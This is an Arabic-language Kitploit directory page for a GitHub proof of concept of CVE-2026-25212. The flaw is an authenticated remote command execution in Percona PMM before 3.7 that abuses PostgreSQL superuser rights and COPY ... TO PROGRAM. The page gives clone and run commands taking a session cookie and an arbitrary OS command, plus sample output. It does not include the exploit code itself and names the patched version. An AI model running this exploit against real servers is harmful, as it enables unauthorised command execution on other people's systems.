Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-25212 — POC لـ CVE-2026-25212 | Kitploit
أدوات/GitHubGitHub/5170temp/cve-2026-25212
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأمن قواعد البيانات
GitHub5170temp/cve-2026-25212

CVE-2026-25212

POC لـ CVE-2026-25212

عرض المستودع
21منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-25212 – إثبات مفهوم لـ RCE في Percona PMM

حرج – CVSS 9.9 – تنفيذ أوامر عن بعد مع المصادقة في PMM < 3.7.


الوصف

يستغل هذا الإثبات المفهومي ثغرة حيث يحتفظ مستخدم PostgreSQL داخلي في PMM بصلاحيات 'SUPERUSER'. يمكن للمهاجم الموثَّق (بحقوق 'pmm-admin') إساءة استخدام ميزة 'إضافة مصدر بيانات' وتنفيذ أوامر اعتباطية لنظام التشغيل باستخدام 'COPY ... TO PROGRAM' في PostgreSQL.

الإصدارات المتأثرة: PMM < 3.7
الإصدار المُصحَّح: PMM 3.7 (وما بعده)


المتطلبات

  • Python 3.6+
  • requests (pip install requests)

الاستخدام

root@kitploit:~
git clone https://github.com/5170Temp/CVE-2026-25212
cd CVE-2026-25212
pip install requests

COOKIE_VALUE هي قيمة ملف تعريف الارتباط grafana_session الخاص بك مثل 3131e17e1653ee4eeceb703fac45c717

root@kitploit:~
python3 poc.py -t https://pmm.example.com --cookie "COOKIE_VALUE" -c "id"

مثال للمخرجات:

root@kitploit:~
[+] UID: krfbxa-Dk
base
global
pg_commit_ts
pg_dynshmem
pg_hba.conf
pg_ident.conf
pg_logical
pg_multixact
pg_notify
pg_replslot
pg_serial
pg_snapshots
pg_stat
pg_stat_tmp
pg_subtrans
pg_tblspc
pg_twophase
PG_VERSION
pg_wal
pg_xact
postgresql.auto.conf
postgresql.conf
postmaster.opts
postmaster.pid
[+] تم الانتهاء
تنزيل الأداة